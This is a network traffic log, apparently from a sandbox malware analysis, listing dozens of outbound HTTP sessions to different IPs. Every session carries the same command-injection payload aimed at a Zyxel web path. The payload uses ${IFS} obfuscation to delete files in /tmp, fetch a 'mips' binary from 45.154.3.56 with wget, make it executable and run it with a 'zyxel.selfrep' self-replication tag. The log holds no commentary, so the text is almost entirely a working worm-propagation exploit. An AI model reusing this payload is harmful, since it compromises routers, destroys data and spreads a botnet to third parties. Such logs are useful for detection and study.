                        1718192.168.2.143810049.209.139.98443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119636059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1719192.168.2.145316249.118.165.22443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119653940 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1720192.168.2.1452738124.210.37.19443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119713068 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1721192.168.2.145365012.23.148.44443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119746923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1722192.168.2.1453144150.45.157.145443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119791031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1723192.168.2.145632635.177.117.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119844913 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1724192.168.2.1453598103.230.105.67443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119878054 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1725192.168.2.14567169.34.122.241443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119913101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1726192.168.2.1432882172.58.125.205443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119966984 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1727192.168.2.1457876117.212.157.78443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.119992971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1728192.168.2.1439238169.251.197.211443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120043993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1729192.168.2.1456634193.29.243.107443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120078087 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1730192.168.2.1450440123.56.203.82443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120126963 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1731192.168.2.145565835.242.92.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120160103 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1732192.168.2.1441906205.211.129.162443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120227098 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1733192.168.2.145812627.40.170.79443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120265007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1734192.168.2.144830665.212.84.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120320082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1735192.168.2.1450036118.32.68.116443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120349884 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1736192.168.2.143287454.106.74.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120395899 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1737192.168.2.145896049.194.175.214443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120450020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1738192.168.2.1444188121.106.5.174443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120490074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1739192.168.2.1450144104.85.180.33443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120521069 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1740192.168.2.144569884.119.99.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120579958 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1741192.168.2.1446770218.253.198.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120595932 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1742192.168.2.1439716103.38.38.76443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120642900 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1743192.168.2.145597299.58.138.42443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120661020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1744192.168.2.144214295.204.209.106443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120702028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1745192.168.2.145762678.231.199.11443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120744944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1746192.168.2.144627254.192.72.206443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120786905 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1747192.168.2.1435476184.44.142.28443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120839119 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1748192.168.2.143941454.31.183.83443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120892048 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1749192.168.2.144419869.213.51.161443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120929003 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1750192.168.2.143965061.94.246.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.120973110 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1751192.168.2.145360476.247.250.148443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121035099 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1752192.168.2.1459866202.116.172.208443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121059895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1753192.168.2.1453108167.182.254.98443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121103048 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1754192.168.2.1448064209.33.22.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121165991 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1755192.168.2.143801412.254.61.134443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121191025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1756192.168.2.1433980141.170.38.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121241093 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1757192.168.2.144832887.243.106.87443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121301889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1758192.168.2.1436038148.131.192.9443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121334076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1759192.168.2.1456174208.97.245.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121372938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1760192.168.2.1443248191.215.144.10443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121436119 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1761192.168.2.145349257.18.53.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121469021 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1762192.168.2.1459964128.95.118.12443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121521950 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1763192.168.2.1451392147.108.212.39443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121571064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1764192.168.2.144620459.187.83.63443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121599913 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1765192.168.2.1433560124.74.211.116443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121649027 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1766192.168.2.1446870131.65.242.190443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121679068 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1767192.168.2.1440096118.86.80.88443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121731997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1768192.168.2.1457846132.239.163.165443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121761084 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1769192.168.2.1436094169.41.123.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121815920 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1770192.168.2.144355220.18.64.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121860981 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1771192.168.2.1445812158.43.155.137443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121892929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1772192.168.2.145387692.141.98.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121942043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1773192.168.2.1453848188.182.146.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.121985912 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1774192.168.2.143658487.37.85.88443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122028112 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1775192.168.2.144599242.178.155.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122096062 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1776192.168.2.145092895.72.238.255443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122123957 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1777192.168.2.1434640203.106.11.187443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122173071 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1778192.168.2.146069242.28.217.57443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122199059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1779192.168.2.145328873.213.27.79443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122224092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1780192.168.2.1433078168.126.203.199443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122253895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1781192.168.2.1444536142.73.69.122443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122292995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1782192.168.2.144113058.79.211.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122359991 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1783192.168.2.145409473.238.192.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122381926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1784192.168.2.145613488.108.215.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122426033 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1785192.168.2.145123265.229.61.6443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122469902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1786192.168.2.1459230205.247.87.194443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122498035 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1787192.168.2.1443726128.161.227.41443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.122562885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


